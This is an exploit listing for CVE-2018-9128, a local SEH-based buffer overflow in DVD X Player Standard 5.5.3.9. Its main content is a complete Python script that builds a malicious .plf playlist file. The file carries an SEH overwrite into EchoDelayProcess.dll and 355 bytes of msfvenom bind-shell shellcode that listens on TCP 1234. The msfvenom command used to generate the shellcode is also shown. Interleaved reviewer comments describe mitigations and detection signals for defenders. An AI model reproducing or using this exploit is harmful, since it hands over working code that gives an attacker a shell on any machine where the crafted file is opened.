DVD X Player Standard 5.5.3.9 - Buffer Overflow
来源:http://hack2rule.wordpress.com/ 作者:Paul 发布时间:2018-04-11
######################################################
# Exploit Title: Buffer Overflow on DVD X Player Standard 5.5.3.9
# Date: 29.03.2018
# Vendor Homepage: http://www.dvd-x-player.com
# Software Link: http://www.dvd-x-player.com/download/DVDXPlayerSetup-
# Standard.exe
# Category: Local (SEH Based)
# Exploit Credit: Prasenjit Kanti Paul
# Web: http://hack2rule.wordpress.com/
# Version: 5.5.3.9
# Tested on: Windows XP SP3 x86
# CVE: CVE-2018-9128
######################################################
#
# Overview: this proof of concept writes a single crafted ".plf" file
# (presumably a playlist file that the player parses -- confirm against the
# advisory). The file is laid out as:
#   608 filler bytes | 4-byte next-SEH field | 4-byte SEH handler address |
#   100 NOP bytes | 355-byte msfvenom payload
# The header classes the issue as local and SEH based, i.e. the overflow
# reaches a structured-exception-handler record on the stack.
#
# Reviewer notes for defenders (drawn from this listing only):
#   - The handler address below points into EchoDelayProcess.dll, a module
#     shipped with the player. That only works if the module is not covered
#     by SafeSEH and loads at a fixed address -- presumably the case on the
#     tested Windows XP SP3 build; verify on the build you assess. SEHOP
#     (not available on XP) and ASLR/DEP on later Windows versions are the
#     generic mitigations for this pattern.
#   - The payload is windows/shell_bind_tcp with LPORT=1234, so the
#     observable effect is the player process opening a listening socket on
#     TCP 1234. A media player that starts listening on a port, or that
#     spawns a command shell, is a strong detection signal.
#   - This PoC's file begins with a 608-byte run of 0x41; the filler is
#     arbitrary, so treat it as a signature for this sample only.
#   - NOTE(review): the page names no fixed version; confirm vendor status
#     before relying on an update as the remediation.
#
# Payload generation log, as recorded by the author:
# root@PKP:~# msfvenom -p windows/shell_bind_tcp EXITFUNC=seh LPORT=1234 -b "\x00\x0a\x0d\x1a" -f python
# No platform was selected, choosing Msf::Module::Platform::Windows from the payload
# No Arch selected, selecting Arch: x86 from the payload
# x86/shikata_ga_nai chosen with final size 355
# Payload size: 355 bytes
# Final size of python file: 1710 bytes

# Output file. The script relies on str literals holding raw bytes and
# writes them through a text-mode handle, which suggests it was written for
# Python 2. (The name `file` also shadows the Python 2 builtin.)
file = open("exploit_dvdx_player_standard_5.5.3.9.plf","w")

# Filler up to the SEH record; 608 is the offset the author determined for
# version 5.5.3.9.
buffer = "\x41" * 608
# Value placed in the record's "next" field: EB 06 is an x86 short jump
# forward by six bytes, padded with two NOPs.
next_seh = "\xeb\x06\x90\x90"
# Handler field, little-endian 0x025F13BC.
seh = "\xBC\x13\x5F\x02"  # pop/pop/ret : EchoDelayProcess.dll
# NOP padding between the SEH record and the payload.
nops = "\x90" * 100

# msfvenom output (x86/shikata_ga_nai encoded, 355 bytes), reproduced
# unchanged from the log above.
buf = ""
buf += "\xda\xd4\xd9\x74\x24\xf4\xb8\xb3\xb9\xc8\xae\x5a\x31"
buf += "\xc9\xb1\x53\x83\xc2\x04\x31\x42\x13\x03\xf1\xaa\x2a"
buf += "\x5b\x09\x24\x28\xa4\xf1\xb5\x4d\x2c\x14\x84\x4d\x4a"
buf += "\x5d\xb7\x7d\x18\x33\x34\xf5\x4c\xa7\xcf\x7b\x59\xc8"
buf += "\x78\x31\xbf\xe7\x79\x6a\x83\x66\xfa\x71\xd0\x48\xc3"
buf += "\xb9\x25\x89\x04\xa7\xc4\xdb\xdd\xa3\x7b\xcb\x6a\xf9"
buf += "\x47\x60\x20\xef\xcf\x95\xf1\x0e\xe1\x08\x89\x48\x21"
buf += "\xab\x5e\xe1\x68\xb3\x83\xcc\x23\x48\x77\xba\xb5\x98"
buf += "\x49\x43\x19\xe5\x65\xb6\x63\x22\x41\x29\x16\x5a\xb1"
buf += "\xd4\x21\x99\xcb\x02\xa7\x39\x6b\xc0\x1f\xe5\x8d\x05"
buf += "\xf9\x6e\x81\xe2\x8d\x28\x86\xf5\x42\x43\xb2\x7e\x65"
buf += "\x83\x32\xc4\x42\x07\x1e\x9e\xeb\x1e\xfa\x71\x13\x40"
buf += "\xa5\x2e\xb1\x0b\x48\x3a\xc8\x56\x05\x8f\xe1\x68\xd5"
buf += "\x87\x72\x1b\xe7\x08\x29\xb3\x4b\xc0\xf7\x44\xab\xfb"
buf += "\x40\xda\x52\x04\xb1\xf3\x90\x50\xe1\x6b\x30\xd9\x6a"
buf += "\x6b\xbd\x0c\x06\x63\x18\xff\x35\x8e\xda\xaf\xf9\x20"
buf += "\xb3\xa5\xf5\x1f\xa3\xc5\xdf\x08\x4c\x38\xe0\x32\x5f"
buf += "\xb5\x06\x50\x4f\x90\x91\xcc\xad\xc7\x29\x6b\xcd\x2d"
buf += "\x02\x1b\x86\x27\x95\x24\x17\x62\xb1\xb2\x9c\x61\x05"
buf += "\xa3\xa2\xaf\x2d\xb4\x35\x25\xbc\xf7\xa4\x3a\x95\x6f"
buf += "\x44\xa8\x72\x6f\x03\xd1\x2c\x38\x44\x27\x25\xac\x78"
buf += "\x1e\x9f\xd2\x80\xc6\xd8\x56\x5f\x3b\xe6\x57\x12\x07"
buf += "\xcc\x47\xea\x88\x48\x33\xa2\xde\x06\xed\x04\x89\xe8"
buf += "\x47\xdf\x66\xa3\x0f\xa6\x44\x74\x49\xa7\x80\x02\xb5"
buf += "\x16\x7d\x53\xca\x97\xe9\x53\xb3\xc5\x89\x9c\x6e\x4e"
buf += "\xb7\x6d\xa2\x5b\x20\xd4\x57\x26\x2c\xe7\x82\x65\x49"
buf += "\x64\x26\x16\xae\x74\x43\x13\xea\x32\xb8\x69\x63\xd7"
buf += "\xbe\xde\x84\xf2"

# Concatenate the parts in stack order and write the file; 716 bytes
# (608 + 4 + 4 + 100) precede the payload.
file.write(buffer + next_seh + seh + nops + buf)
file.close()